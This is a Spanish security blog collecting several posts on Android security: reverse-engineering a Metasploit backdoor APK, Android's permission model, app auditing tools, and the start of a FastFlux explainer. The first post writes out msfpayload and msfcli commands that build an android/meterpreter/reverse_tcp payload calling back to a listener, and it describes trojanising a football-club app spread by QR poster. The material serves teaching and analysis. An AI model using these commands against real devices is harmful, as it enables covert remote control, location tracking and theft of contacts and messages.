Ingeniería Inversa a una APK maliciosa

Muy grande la jornada que echamos en la Hack & Beers Vol.2 sobre Mobile Security con muchos amigos. Agradeceros a todos, asistentes y compañeros de charlas, vuestras aportaciones e interés. Pues bien, siguiendo con la charla de seguridad de Android y viendo qué tan fácil es hacerle la ingeniería inversa a una APK de Android, nosotros vamos a ir un poco más allá y vamos a obtener el código fuente de un APK maliciosa creada por Metaesploit, así que vamos manos a la obra.

Antes de nada os muestro lo que sería el supuesto escenario de ataque de manera visual para que lo entendáis mejor:

CREANDO UNA APK MALICIOSA

Vamos a crear una APK para Android maliciosa, para ello lo haremos desde Kali Linux, haciendo uso de las herramientas del framework Metasploit. Desde consola vamos a usar el comando msfpayload para inyectar un payload dentro de la APK.

Primero vemos los payload disponibles para Android:

Vamos a seleccionar un payload que nos devuelva una sesión de meterpreter y que sea del tipo reverse_tcp. Para ello ponemos el siguiente comando:

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=4444 R > backdoor.apk

Además también hemos configurando el equipo al que se conecta (LHOST) y el puerto de conexón (LPORT), para inyectarlo en la aplicación maliciosa.

De esta manera cualquier usuario que se instale la APK (backdoor.apk) va a lanzar una sesión de meterpreter a la máquina 192.168.1.10 que estará escuchando en el puerto 4444 (ver el escenario de ataque). Para que la máquina con Metasploit esté escuchando debemos hacer uso del exploit/multi/handler con el payload android/meterpreter/reverse_tcp y configurarlo con los parámetros con los cuales creamos la aplicación maliciosa. 

msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=4444 E

Pero el objetivo de hoy no es compromenter el terminal, sino obtener el código de dicha aplicación maliciosa para analizarlo.

INGENIERÍA INVERSA DE LA APK

Una vez que tenemos la backdoor.apk vamos a seguir los siguientes pasos, haciendo uso de herramientas (apktool, dex2jar y jd-gui) que ya nombramos en entradas anteriores:

Obtención del fichero de manifiesto:

1. Desempaquetamos la APK con la aplicación apktool "apktool d backdoor.apk" y se nos crea una carpeta con con varias carpetas y ficheros. Dentro podemos encontrar, entre otras cosas, nuestro tan famoso fichero de manifiesto AndroidManifest.xml.

Obtención de los ficheros JAVA:

1. Renombramos la APK como backdoor.zip y descomprimimos dicho paquete en una carpeta que llamaremos backdoor-zip. El fichero que más nos interesa es el classes.dex, donde tendremos las clases de la aplicación en formato dex (código para la Dalvik VM).
2. Incluimos dentro de esta misma carpeta todos los ficheros del paquete dex2jar y ejecutamos el comando "dex2jar classes.dex". Obtendremos por tanto el fichero classes_dex2jar.jar, donde tenemos las clases de la aplicación en formato jar.
3. Por último cogemos el fichero jar y los abrimos con la aplicación jd-gui. Podemos ver todas las clases de la aplicación en formato java. Ahora pulsamos sobre File > Save All Sources y grabamos dichos ficheros en la carpeta que indiquemos, obtenemos el paquete classes_dex2jar.src.zip con todas las clases 

ANALIZANDO CÓDIGO

Primeramente vamos a analizar el archivo de manifiesto AndroidManifest.xml.

Permisos que solicita:

• android.permission.INTERNET: Permite a las aplicaciones abrir sockets de red.
• android.permission.ACCESS_NETWORK_STATE: Permite que las aplicaciones accedan a información sobre redes.
• android.permission.ACCESS_COURSE_LOCATION: Permite que una aplicación acceda a la ubicación aproximada derivado de las fuentes de ubicación de red, tales como torres de telefonía móvil y Wi-Fi.
• android.permission.ACCESS_FINE_LOCATION: Permite que una aplicación acceda a la ubicación precisa de fuentes de localización como GPS, antenas de telefonía móvil y Wi-Fi.
• android.permission.READ_PHONE_STATE: Permite acceso al estado del teléfono 
• android.permission.SEND_SMS: Permite que una aplicación envíe mensajes SMS.
• android.permission.RECEIVE_SMS: Permite que una aplicación reciba mensajes SMS.
• android.permission.RECORD_AUDIO: Permite que una aplicación para grabar audio
• android.permission.CALL_PHONE: Permite que una aplicación para iniciar una llamada de teléfono sin tener que pasar a través de la interfaz de usuario del sintonizador para el usuario para confirmar la llamada de ser colocado.
• android.permission.READ_CONTACTS: Permite que una aplicación lea los datos de Contactos del usuario.
• android.permission.WRITE_CONTACTS: Permite que una aplicación escriba en los datos de Contactos del usuario.
• android.permission.WRITE_SETTINGS: Permite que una aplicación leer o escribir la configuración del sistema.
• android.permission.CAMERA: Acceso a todas las funciones de la cámara.

Si vemos detenidamente todos los procesos, podemos hacer casi cualquier cosa con estos permisos, y sobre todo de manera remota, ya que tenemos permiso para abrir socket y cambiar configuración de sistema. Podemos hacer llamadas a números de tarificación especial, obtención de fotografías en vivo, venta de contactos a terceros, grabar las coversaciones, localizar a la persona por su posición GPS y un largo etc. 

Otra información interesanse que podemos encontrar es la siguiente:

• android:name=".MainActivity": Es la clase principal desde donde se carga el LAUNCHER de la actividad principal, es decir, cuando arranca la aplicación es la clase que tiene el hilo principal de ejecución. Muy importante a la hora de que analicemos el código y saber desde donde empezar.
•  android:theme="@android:style/Theme.NoDisplay": Es el estilo que va a utilizar la actividad principal, que en este caso se trata de un estilo especial que no contiene interfaz de usuario. Por tanto nuestro código simplemente se va a ejecutar y no nos va a mostrar nada en pantalla, eso si, en memoria si va a estar presente.

Pasamos ahora a analizar los archivos .JAVA encontrados en el classes_dex2jar.src.zip:

Si controlamos algo de temas de programación en Android, a simple vista podemos identificar la función de cada fichero de código:

• MainActivity.java: clase principal de la aplicación, ya que lo vimos en el manifiesto.
• BuildConfig.java: clase con información de configuración a la hora de desarrollar la apk.
• R.java: clase que se crea automáticamente en cualquier aplicación apk, donde se asigna un identificador numérico a cada uno de los recursos utilizados en la aplicación.
• Payload.java y PayloadTrusManage.java: son clases propias del proyecto en si, que ahora pasaremos a analizar.

Vemos el MainActivity de la backdoor:

Podemos encontrar que nada más crearse la actividad principal (método onCreate) y llamar al constructor de la clase (super.onCreate), lo siguiente que hace es llamar a un método de clase de la clase Payload, para posteriormente finalizar la ejecución (finish). Seguramente en este método de clase se lance otro hilo de ejecución, ya que el hilo principal muere con el finish. Vamos a ver la clase Payload:

Para empezar vemos en el código que hay gran cantidad de librerías importadas que nos dan mucho juego como manejadores (Handler), entrada y salida de datos (DataInputStream y DataOutputStream), entrada y salida de ficheros (File y FileOutputStream), socket (Socket), conexiones https (HttpsURLConnection), etc.

Si seguimos viendo código, en la declaración de atributos de la clase Payload vemos dos atributos bastante interesantes: LHOST y LPORT, que no son sino la dirección IP y el puerto de conexión de nuestra máquina donde estará escuchando Metasploit. Vemos que forman parte de unas cadenas con más caracteres, de manera que un analizador de código no pueda identificar fácilmente una dirección IP o puerto. 

UTILIZANDO EL CÓDIGO Y UN POQUITO DE INGENIERÍA SOCIAL

Podíamos seguir analizando el código fuente paso a paso y obtener funciones como reverseTCP, reverseHTTP, startReverseConn, etc. Pero en vez de eso, hemos creado una aplicación del Córdoba C.F., aprovechando que somos equipo de primera, y le hemos inyectado el código del Payload analizado. 

Esto lo podría utilizar una persona con malas intenciones y ahora sólo tendría que echar la imaginación a volar y utilizar la Ingeniería Social para divulgar la APK maliciosa, como por ejemplo colgar este cartel en los alrededores del estadio.

Os podéis descargar sin problemas la APK desde el código QR porque la aplicación está apuntando a una dirección IP local y porque le he quitado todo el código referente a las funciones de meterpreter, es decir, sólo realiza la conexión reverse_tcp, pero no responde bajo ningún comando de los de meterpreter.

Todo este contenido viene a complementar la charla de Seguridad en Android de la Hack & Beers Vol.2. Si no pudisteis asistir aquí os dejo el enlace de mi presentación (Seguridad en Android.pdf) y el de las charlas (http://new.livestream.com/cosfera/hbodb).

Quiero dar de nuevo las gracias a Miguel Ángel Arroyo de Hacking Ético por contar conmigo para la Hack & Beers. Espero que os haya gustado !! 

Un handshake para todos

@eduSatoe

"Pues conseguir cien victorias en cien batallas no constituye la mayor habilidad. Dominar al enemigo sin luchar, esta sí es la más alta habilidad"

Gichin Funakoshi

Read More

Metodología de Seguridad en Android

En esta nueva entrada vamos a ver cómo trabaja los sistemas Android en cuanto a la metodología que sigue de seguridad a la hora de ejecutar sus aplicaciones y los permisos que requieren. En primer lugar vamos a ver algunos conceptos previos sobre Android que debemos conocer:

• Apk (aplicación en Android): conjunto de actividades y servicios relacionados entre si para resolver un objetivo común. Cada apk se ejecuta en un proceso, es decir, tenemos un proceso por aplk.
• Actividad: se llama así a cada una de las pantallas de una aplicación en Android. Cada aplicación tiene una actividad principal y desde aquí se va llamando al resto de actividades de la aplicación.
• Estados de una actividad: son los diferentes momentos en los cuales se encuentra una actividad.
• Máquina Virtual Dalvik (DVM): es una máquina virtual que utilizan los dispositivos que usan Android, la idea es ejecutar cada proceso en una DVM diferente (ya que consume muy pocos recursos), consiguiendo con esto un aislamiento en cuanto a código fuente, gestión de memoria e hilos de ejecución, lo que hace que ningún proceso pueda acceder a código o variables de otro, salvo permiso expreso.

Una vez aclarados estos conceptos, quién no se ha preguntado alguna vez ¿por qué aplicaciones que hemos cerramos desde cualquier apk de administración de tareas como Advanced Task Killer, siguen abiertas en memoria tras cerrarlas?

La respuesta es muy sencilla, en Android un proceso sigue residiendo en memoria aunque el usuario cierre todas sus actividades y/o servicios. Una aplicación sólo se elimina de memoria si el sistema necesita memoria para otra cosa, por tanto, el sistema necesita ordenar jerárquicamente los procesos por orden de importancia, de manera que cuando necesite eliminar alguno, elimine el menos importante.

La importancia se establece en el sistema según las actividades activas y el estado de las mismas, sin embargo en cuanto a los servicios sólo pueden estar corriendo o detenidos. Vamos por tanto a ver el ciclo de vida de de un proceso en Android, donde podremos ver los estados y los eventos que se generan.

Ciclo de Vida de un proceso en Android

Eventos:

• onCreate(): se inicializa la apk, se crea la interfaz y puede recibir datos.
• onStart(): se presenta la apk al usuario, ya es utilizable.
• onResume(): cuando el usuario comienza a interactuar con la apk.
• onPause(): la actividad va a pasar a segundo plano.
• onStop(): la actividad va a dejar de ser visible en la interfaz.
• onRestart(): se llama de nuevo a la actividad, que está en memoria, tras haber estado parada. No se pierde la información con la que estaba trabajando ya que normalmente se suele almacenar en un fichero de preferencias, para cada apk se guarda dentro de la memoria interna en: data/data/nombre.del.paquete/files/shared_prefs/nombre.dpaquete_preferences,xml
• onDestroy(): actividad destruida totalmente.

Estados:

• Activa (Runing): en la pila de ejecución, visible y activa.
• Visible (Paused): cuando se llama a otra actividad desde la actividad actual y se pierde el foco (no está visible o sólo parcialmente).
• Parada (Stopped): la actividad ya no está visible, pero sigue estando en memoria.
• Destruida (Destroyed): cuando el sistema necesita espacio saca de la pila de ejecución las actividades.

He desarrollado una pequeña aplicación en Android para que entendáis bien los estados y eventos por los que pasa una aplicación y como esto hace que se sitúe más arriba o más abajo del orden jerárquico a la hora de matar un proceso por falta de memoria. No requiere ningún tipo de permiso, por tanto podéis estar tranquilos de que no hace nada malo.

Descarga la aplicación EventosWWH.apk: http://goo.gl/Q0YaFb
MD5 checksums: f5ea4ebedaacaaf1563dc99413250012

Aquí os dejo un videotutorial para explicar la aplicación. Si alguno desea el código de aplicación, se lo facilito sin problema, tan solo contactar a través del blog o de mi cuenta personal de twitter @eduSatoe

Orden Jerárquico de Procesos a la hora de liberar memoria

En Android los usuarios no tenemos permisos para finalizar los procesos, es el sistema operativo quien decide cuando finalizar un proceso para liberar memoria, lo cual se puede hacer:

1. Porque se necesite memoria para otro proceso.
2. Porque se produzca un cambio de configuración como un giro de pantalla, cambio de idioma, conexión de un dispositivo de entrada, etc.

El orden jerárquico u orden de prioridad de los procesos es el siguiente:

1. Procesos en primer plano (Foreground process): sólo puede haber uno, es la actividad que ha llamado a onResume().
2. Proceso visible (Visible process): actividad visible aunque no en primer plano (onPaused())
3. Proceso en servicio (Service process): proceso en servicio iniciado con startService().
4. Proceso de fondo (Background process): actividad no visible, está en segundo plano, llamo a onStop(). El sistema debe grabar el estado.
5. Proceso vacío (Empty process): sin componente activo, pero no se quita de memoria.

Los principios de Seguridad en Android

Android basa su seguridad en tres principios que comentamos a continuación:

• Se crea un usuario para cada apk que se instala en el sistema, de tal forma que se pueda restringir el acceso sobre el hardware y otros recursos del sistema, dicho usuario sólo puede tener acceso a sus recursos, es decir, sólo dicho usuario puede acceder a su carpeta de la apk.
• Toda apk debe estar firmada digitalmente por su autor, de tal forma que si alguien quiere cambiar su código deberá firmarla de nuevo.
• Se establece un modelo de permisos, de tal forma que para cada acción comprometida que realice una apk debe estar registrada. Con esto conseguimos que a la hora de instalar una apk, el usuario conocerá los permisos que dicha apk solicita, como acceso a Internet, posición GPS, datos del teléfono, registro de llamadas, etc.

¿Cómo se rompen estos principios de seguridad?

• Respecto a lo de crear un usuario por apk y restringir el acceso a hardware y otros recursos del sistema es una buena idea, pero este principio de seguridad se rompe en el momento en el que rooteemos el teléfono. El hecho de rootear el teléfono es un arma de doble filo, nos permite instalar aplicaciones que tendrán permiso de acceso a cualquier recurso del sistema, con la ventaja que esto supone, herramientas de seguridad como dsPloit o Intercepter-ng, pero el problema vendría cuando le diéramos vía libre a una aplicación para acceder por ejemplo a carpetas como /data/data/com.whatsapp/databases/ donde whatsapp almacena todas las conversaciones y contactos. 

• En cuanto a la firma digital de las aplicaciones, es muy común que además de usar Google Play, descarguemos aplicaciones directamente desde Internet e instalemos en nuestro teléfono, todo por ahorrarnos algunos euros y no pagar el precio que vale en Google Play. Es entonces cuando se nos requiere en nuestro sistema que activemos la casilla "Fuentes Desconocidas", y ahí es donde estamos rompiendo otro principio de seguridad de Android, ya que cualquier usuario con conocimientos puede comprar una apk de Google Play, hacerle ingeniería inversa al paquete apk e inyectar un código malicioso, para después publicar la aplicación en Internet de manera gratuita. Dicho paquete no puede estar firmado por la persona que desarrollo la apk que aparece en Google Play, pero por tal de ahorrarnos unos euros aceptamos lo que sea. 
  

• 
• Y por último tenemos el modelo de permisos que utiliza Android, mediante el cual se nos muestra los permisos que requiere una aplicación y que nosotros debemos aceptar si queremos que instalar dicha aplicación, en cuanto a estos, los desarrolladores se aprovechan mucho del desconocimiento de la gente, ya que por tal de jugar al juego de moda de turno (Candy Crash) o instalar la última versión de la apk de la red social más famosa (Facebook) somos capaces de dar permiso para acceder a nuestros datos personales, contactos, correos,etc, que acabaran posteriormente en manos de terceros que les paguen buen dinero por ello. Este modelo de permisos está muy bien, pero teniendo en cuenta que el usuario final es el eslabón más débil de la cadena, hace que dicho principio de la seguridad no se le de la importancia que tiene por parte de los usuarios y sean los propios usuarios quien lo rompan.

¿Cómo protegernos?

Para protegernos de estas amenazas existen algunas herramientas que debemos tener instaladas en nuestro móvil Android, la principal es tener un antivirus como puede ser AVG, el cual además de detectar posibles amenazas tiene una base de datos de aplicaciones de Google Play que están tipificadas como peligrosas y que a la hora de instalarlas te avisa de que pueden ser dañinas para tu terminal.

La otra aplicación de reciente aparición es Conan Mobile de Inteco, una aplicación que examina todos los principios de la seguridad de Android: si tenemos aplicaciones con acceso root, aplicaciones que no están firmadas digitalmente y los permisos que requieren todas las aplicaciones del nuestro terminal, os aseguro que os podéis sorprender de lo que hemos llegado a aceptar por tal de instalar una aplicación en el teléfono.

Cual fue mi sorpresa, cuando tras instalar Conan Mobile y revisar todos los permisos de seguridad de las aplicaciones, encuentro una aplicación que todos tenemos en nuestro móvil, como es la de la linterna, la cual requiere permisos tales como saber tu posición GPS, tu número de IMEI o incluso saber quien me llama por teléfono. Acto seguido me voy a la información de la aplicación y me encuentro los siguientes permisos:

Es decir, que a cambio de poder usar la maldita linterna, podían meterse hasta en la "cocina" de mi teléfono, la aplicación en concreto es "Linterna Brillante Gratis" de la compañía Goldenshores Technologies LLC. Indagando por Internet encontré el siguiente artículo sobre como dicha aplicación roba información que después facilita a terceros, incumpliendo lo que dice su contrato de privacidad con el usuario, aquí os dejo el enlace goo.gl/rekD3M

A continuación os dejo algunos enlaces de interés relacionados con el tema que seguro son de vuestro agrado.

Desempaquetar aplicaciones en Android. Ingeniería Inversa sobre una APK. Analizando aplicaciones con Andrubis. Auditoría de aplicaciones en Android. Blog: White Walking of Hacking. Eduardo Sánchez @eduSatoe http://goo.gl/fm3MED

Unos estafadores utilizan la imagen de La Sexta, RTVE, Menéame o Antena3 para robar tus datos de tu Android. Blog: Un informático en el lado del mal. Chema Alonso@chemaalonso http://goo.gl/OY3GVu

Uso de Conan Mobile, la última aplicación de INTECO para comprobar la seguridad en tu móvil. 

Blog: Hacking Ético. Miguel Ángel Arroyo @Miguel_Arroyo76 http://goo.gl/Z3nHGN

Lista de permisos que podemos encontrar en el fichero AndroidManifest.xml de cualquier aplicación Android junto con su descripción. http://goo.gl/Dl2cjL

Espero que hayáis aprendido algo nuevo sobre la metodología que usa Android en cuanto a su seguridad.

Un saludo !!

@eduSatoe

"La seguridad de un sistema es igual a la seguridad de su punto más débil"

Read More

Auditoría de aplicaciones en Android - Tirando del hilo...

En la actualidad el 90% de las personas llevan un terminal móvil en su bolsillo la mayor parte del día, con las ventajas que esto supone en cuanto a acceso a la información y poder estar conectado a la red en cualquier momento. No obstante, esto ha puesto a estos dispositivos en el punto de mira de los desarrolladores de malware y por tanto hace que nos debamos preocupar también de la seguridad de estos dispositivos al igual que lo hacemos con nuestros PC portátiles o de sobremesa, ya que el crecimiento de malware para dispositivos móviles está creciendo en gran medida día a día.

En la actualidad el sistema operativo que triunfa en estos dispositivos es IOS, pero en segundo lugar y no menos importante lo hace Android, que año tras año le va comiendo terreno al sistema operativo de la manzana. A continuación os muestro un gráfico de los porcentajes de uso de SSOO móviles del año 2013:

El objetivo de esta entrada en el blog es conocer un poco como podemos llevar a cabo la auditoría de una aplicación en Android que una empresa ha desarrollado y nos pide que evaluemos su seguridad. Para ello lo primero que vamos a hacer, como en todo proceso de auditoría, no es otra cosa que obtener la mayor cantidad de información de la aplicación. En nuestro caso, la investigación no va orientada a buscar malware, sino a testear nuestra APK para poder corregir posibles vulnerabilidades.

Estructura de una APK

A la hora de auditar cualquier aplicación o sistema operativo, es muy importante conocer como funciona y la estructura de ficheros de un proyecto en Android. Por tanto toda APK desarrollada contiene:

• Un descriptor de la aplicación: AndroidManifest.xml, en donde podemos encontrar los permisos que necesita la aplicación, así como la definición de parámetros de funcionamiento. Un permiso sería poder hacer una llamada de teléfono desde la aplicación. Pincha aquí para más info.

<uses-permission android:name="android.permission.CALL_PHONE"/>

• Código fuente de la aplicación: los ficheros .java que se ubican en la carpeta src, así como .

• Ficheros de recursos: .xml con las interfaces gráficas, menús o parámetros usados por la aplicación, ficheros de imágenes (.jpg, .png, etc), archivos multimedia... todo ello en la carpeta res. Pincha aquí para más info.

Desempaquetando la APK

Lo primero que debemos hacer en este momento es desempaquetar el APK. Este fichero no es sino un fichero comprimido en ZIP,si nosotros renombramos la aplicacion .apk a .zip y abrimos con cualquier descompresor, podemos ver los archivos internos que trae, simplemente tendremos que utilizar la herramienta adecuada para poder visualizarlos correctamente.

1.Para el AndroidManifest que está codificado en XML binario usaremos apktool, disponible para Windows, Linux y MAC OS. Nos descargaremos de https://code.google.com/p/android-apktool/ la aplicación y el script de instalación según la plataforma que elijamos. Y ahora ejecutamos el siguiente código para poder obtener el XML original:

apktool d aplicacion.apk directorioSalida

2.Para los ficheros de código fuente, cogeremos el fichero classes.dex (está dentro de la APK al abrirlo con WinZip). Este fichero contiene las clases de Java compiladas en formato .dex, dicho formato es el necesario para ejecutarse sobre la máquina virtual Dalvik (Dalvik VM). 

Haciendo uso de la herramienta dex2jar (http://code.google.com/p/dex2jar) obtendremos un fichero .jar, que no es sino el fichero de clases compilado en java.. Para obtener el código java podemos usar JD-GUI (http://jd.benow.ca/jd-gui/) y analizar, ahora si, código java legible. Si lo que buscamos es algún tipo de malware, entonces deberíamos buscar si dicho código tiene alguna función sospechosa como: 

• openFileOutput: método que nos permite escribir ficheros en la memoria interna.
• openFileInput: método que nos permite leer ficheros de la memoria interna.
• Socket: clase que se utiliza para comunicaciones Cliente-Servidor y por tanto intercambio de información.
• Webview: clase que nos permite visualizar una Web dentro de una aplicación Android y por tanto la ejecución de código javascript, con las consecuencias que esto puede conllevar.

3. Por último tenemos los ficheros de recursos en la carpeta res donde encontramos, entre otras, las siguientes subcarpetas:

• drawable: las imágenes que utilza la aplicación.
• layout: ficheros xml con las configuraciones de las diferentes vistas de la interfaz. Para poder visualizarlas desde el código java se asocia la vista con estos ficheros xml. Además es necesario declaran en el AndroidManifest alguna actividad, caso de no ser así quiere decir que la aplicación no tiene interfaz de usuario y seguramente se instale como servicio de sistema, muy común en los malware.
• menu: ficheros xml con las configuraciones de los menús.
• values: ficheros de configuración como valores de las cadenas que aparecen en la interfaz, colores, estilos...
• xml: ficheros xml con las preferencias que pueden ser configuradas en la aplicación, hay que tener cuidado con la información que la aplicación almacena sobre las preferencias de las mismas o datos nuestros, ya que cualquier usuario con acceso root o una aplicación con acceso a la memoria interna puede acceder a información sensible que contega el fichero de preferencias:

/data/data/nombre.del.paquete/files/shared_prefs/nombre.del.paquete_preferences.xml 

• Podéis encontrar más información al respecto aquí.

Auditando AndroidManifest.xml

Manitree: el objetivo de esta herramienta es detectar posibles inseguridades en el fichero AndroidManifest.xml, ya que si introducimos en dicho archivo valores erróneos podemos comprometer la APK. Descargamos la aplicación en Kali Linux y ejecutamos sobre un archivo AndroidManifest.

En la imagen anterior vemos los permisos a los cuales tiene acceso la APK cuyo fichero xml hemos utilizado, vemos que nos da una advertencia bastante peligrosa (nivel HIGH) ya que la aplicación tiene acceso a la raíz del dispositivo (pathPrefix="/"), lo cual podría comprometer toda la info que podamos tener en el mismo. En esta aplicación el desarrollador debería haber indicado la carpeta en concreta a la cual se puede tener acceso, que debería ser pathPrefix="/directorio.de.la.aplicacion", y no la raíz del sistema.

Si ejecutamos la herramienta con otro fichero AndroidManifest.xml que hemos renombrado con SecretCode.xml obtenemos lo siguiente:

Esta vez hemos encontrado dos códigos de marcación ocultos (*#*#8351#*#* y *#*#8350#*#*), que pueden llevarnos a menús secretos o acciones ocultas (un ejemplo de una puerta trasera o backdoor) que se han reservado los desarrolladores de la aplicación.

A continuación os dejo un enlace donde podéis encontrar todos los permisos que podemos encontrarnos en el AndroidManifest.xml. http://developer.android.com/reference/android/Manifest.permission.html

Ingeniería inversa sobre una APK (.java)

Para llevar a cabo este proceso de ingeniería inversa existen multitud de aplicaciones que obtienen el código fuente a partir del código ya compilado, cierto es que existen ofuscadores de código, pero aún así es posible descompilar gran parte del código ofuscado.

El objetivo de nuestra auditoría no es centrarnos en este proceso, ya que nosotros ya tenemos el código fuente porque nos lo facilita el cliente. No obstante si vamos a indicar que existe una distribución Linux con un set de herramientas preparadas para ingeniería inversa, ya preparadas y configuradas, se llama Android Reverse Engineering (ARE) y podéis descargarla desde https://redmine.honeynet.org/projects/are/ sus credenciales son android/android.

A continuación enumeramos las herramientas que contiene y una breve descripción de las mismas:

• Androguard: herramienta en python para manejar ficheros dex, apk, xml binarios y recursos android arsc.
• Android sdk/ndk: kit de desarrollo de herramientas para android
• APKInspector: herramienta con interfaz gráfica para la inspección de todos los ficheros contenidos en el paquete APK.
• Apktool: herramienta de ingeniría inversa casi perfecta que te devuelve los ficheros originales de los que surgió una aplicación.
• Axmlprinter: conversor de fichero xml binario a xml.
• Ded: herramienta para descompilar apk de android.
• Dex2jar: conversión de ficheros .dex a .jar.
• DroidBox: herramienta de análisis dinámico de aplicaciones android. Lectura de hashes, paquetes entrada/salida en la red, operaciones de entrada/salida de ficheros, permisos eludidos, sms enviados, llamadas, fugas de información, etc.
• Jad: descompilador de Java con interfaz gráfica disponible para MAC OS, Linux y Windows.
• Smali/Baksmali: ensamblador/desensamblador de ficheros dex.

Análisis online con Andrubis

Existe en la red una aplicación llamada Anubis que nos permite chequear nuestros binarios de Windows en busca de malware. El proyecto ha ido creciendo y han creado Andrubis, el cual ahora también nos permite analizar las aplicaciones de Android en busca de malware, para lo cual obtenemos gran parte de información valiosa.

Andrubis nos ofrece un informe detallado sobre el comportamiento de la aplicación, incluyendo el acceso a archivos, acceso a la red, las operaciones criptográficas, código dinámico de carga y las fugas de información. Además también cuenta con un análisis estático donde nos indica las actividades de la aplicación, los servicios, las librerías externas y permisos que necesita.

Con Andrubis tenemos la posibilidad de llevar a cabo el escaneo online (APK máx 8MB) o descargarnos su APK desde la Web e instalarla en el móvil para auditar directamente cualquier aplicación. De una forma o de otra podemos registrarnos para que así nos cree nuestro perfil y puedan guardar todos los informes de todas las aplicaciones que hemos escaneado. Una vez registrados y activada nuestra cuenta vamos a probar el escaneo online:

Seleccionamos el archivo .apk y enviamos para su correspondiente análisis.

Una vez que termine el proceso podemos ver bastante información sobre la aplicación escaneada, tenemos la posibilidad de verlo en HTML o XML. Os dejo el enlace al reporte que genera:

https://anubis.iseclab.org/?action=result&task_id=16c9ab98c8e760ee455d61ec258f6ab15&format=html

De donde podemos sacar permisos que necesita la aplicación, urls, entrada/salida de ficheros en memoria interna, puertos de comunicación...

Análisis en el propio terminal móvil con ISecDroid (apk de Andrubis)

Además de la versión online podemos usar la aplicación de Andrubis para el móvil, sólo la podéis descargar de la Web ya no se encuentra en Google Play y es necesario estar registrado en la Web para introducirle usuario y contraseña. La aplicación se llama ISecDroid y al abrirla nos aparece la siguiente interfaz:

En la opción de Configuration ponemos el nombre de usuario y contraseña así como otras opciones más específicas de configuración, entre otras el poder analizar aplicaciones mayores de 8 MB. El siguiente paso es pulsar sobre la opción App submission y elegir aquellas aplicaciones de las cuales queremos llevar a cabo el análisis.

Le damos a Submit y lo que hace la aplicación es llevar a cabo el análisis y subir el reporte al servidor de la aplicación en la cuenta (username/password) que hemos configurado previamente.

Por último podemos ver en History los reportes de las aplicaciones que hemos analizado.

Lo bueno que tiene el registrarte en la Web de Andrubis es que todos los reportes de los análisis que has llevado a cabo tanto desde el escáner online como desde tú teléfono, son accesibles desde la Web en tu perfil de usuario. Lo vemos en la siguiente imagen:

Una cosa muy interesante de usar la aplicación de ISecDroid en el terminal móvil es que te genera un archivo .pcap con el tráfico de la aplicación, caso de que esta se comunique con algún servidor exterior.

En el siguiente link vemos el reporte del análisis de esta aplicación y vemos como obtenemos direcciones IP y dominios a los cuales se conecta. En el siguiente enlace lo podéis comprobar.

https://anubis.iseclab.org/?action=result&task_id=1c0ca8f10949f2224a5d3cee06e0e7ae8&format=html

Conclusión y Recomendaciones de Seguridad

Como hemos podido comprobar son muchos los datos que podemos obtener de un simple archivo APK y estos exponen información que puede hacer vulnerable nuestro sistema. A continuación os voy a dar una serie de recomendaciones a tener en cuenta a la hora de desarrollar una aplicación en Android, de manera que desde el primer momento que nos pongamos a escribir la primera línea de código, ya estemos teniendo en cuenta la seguridad de la aplicación:

• Mantener una política de privacidad en cuanto a los datos que se utilicen en la misma.
• Reducir al mínimo los permisos que se le facilitan a la aplicación.
• Dar a elegir a los usuarios donde almacenar la información.
• No recabar en la aplicación información innecesaria que nos pueda comprometer.
• No envíe información del dispositivo a través de la aplicación.
• No reutilices código fuente que no entiendes.
• No almacenes a través de la aplicación ficheros logs sobre usuarios o información de tu dispositivo.
• Usa mecanismos de ofuscación de código para evitar o dificultar la ingeniería inversa.
• En todas las entradas de datos debes tener en cuenta su validación previa para evitar posibles errores.

Llegados hasta aquí, creo haber dado una visión en profundidad tanto de la estructura interna de una aplicación en Android, como los posibles fallos de seguridad que podemos encontrar en ellas. Hemos mostrado algunas herramientas que son de utilidad, pero existen muchas otras en la red igual de válidas. Además de estas técnicas, también podemos añadirle a nuestro análisis otras comúnmente usadas, como el escaneo externo de puertos que usa la aplicación o la obtención de metadatos de los ficheros de la misma.

Sin más, me despido hasta la próxima entrada, no sin antes nombrar a Miguel Ángel Arroyo (@Miguel_Arroyo76) responsable del magnífico blog http://hacking-etico.com. Espero que te sirva esta información, ya que siempre somos los demás los que ampliamos conocimientos gracias a tus charlas, entradas en tu blog o tus tweets. 

Un handshake compañero !!

@eduSatoe

"No se puede desatar un nudo sin saber cómo está hecho."

Aristóteles

Read More

Fraude online: Infraestructura FastFlux

Algo que siempre me ha llamado la atención es conocer la forma en la que actúan los cibercriminales, que métodos utilizan para distribuir malware sin que nos demos cuenta etc.. Por ello siempre he estado buscando información sobre este tema e intentar llevarlo a cabo yo mismo dentro de mi propia red virtual para ponerme en la piel de un cibercriminal. Viendo la facilidad con la que se puede llevar a cabo este ataque, voy a explicaros de que trata eso de "Infraestructura FastFlux" de la mejor forma que pueda para que no sean tan técnico y hasta las personas que no tengan mucha idea sobre esto, sepa de que va y pueda así tener un poco más de seguridad a la hora de navegar por Internet.

A diario que navegamos por Internet hacemos peticiones a los servidores para ver su contenido y poder navegar por el sitio web del dominio. Esto es una simple arquitectura cliente-servidor. Os dejo una imagen a continuación y os explicaré paso a paso lo que hacemos todos los que navegamos por Internet a diario.

Conexión a un servidor web

Paso 1: Cuando queremos entrar por ejemplo en el dominio marca.com para visualizar su contenido, lo primero que hacemos es teclear en la barra de direcciones la url que en este caso sería, http://www.marca.com, al hacer esa petición le preguntamos a nuestro servidor DNS que normalmente es el que nos proporciona nuestro ISP (vodafone, orange, ono..) si conoce la dirección marca.com.

Paso 2: El servidor DNS nos contesta con la dirección IP que corresponde a marca.com.

Paso 3: Hacemos la petición HTTP a la dirección IP que nos dio anteriormente el servidor DNS, es decir 193.110.128.199.

Paso 4: El servidor de marca.com nos responde con la página principal y así podremos navegar por la página y visitar cada una de las secciones que tenga.

Una vez entendido como funciona esta arquitectura tan típica de cliente-servidor, vamos a ponerlo ahora un poco más complicado y explicaremos en que consiste la infraestructura que utilizan muchos cibercriminales llamada FastFlux simple para distribuir código malicioso, hacer phishing, enviar spam entre otras cosas. Es muy común ver en esta técnica como los ciberdelincuentes utilizan dicha técnica para intentar ocultar la dirección del servidor, una de las maneras puede ser con goo.gl o bitly. En esta técnica el servidor DNS devolverá varias direcciones IP que irán cambiando cada cierto tiempo muy corto. Estas direcciones IP serán zombies (ordenadores infectados) que actuarán de proxys (intermediarios) entre el cliente que será la víctima y el servidor atacante que quiere infectarnos. En la siguiente imagen podemos verlo y a continuación pasaré a explicarlo.

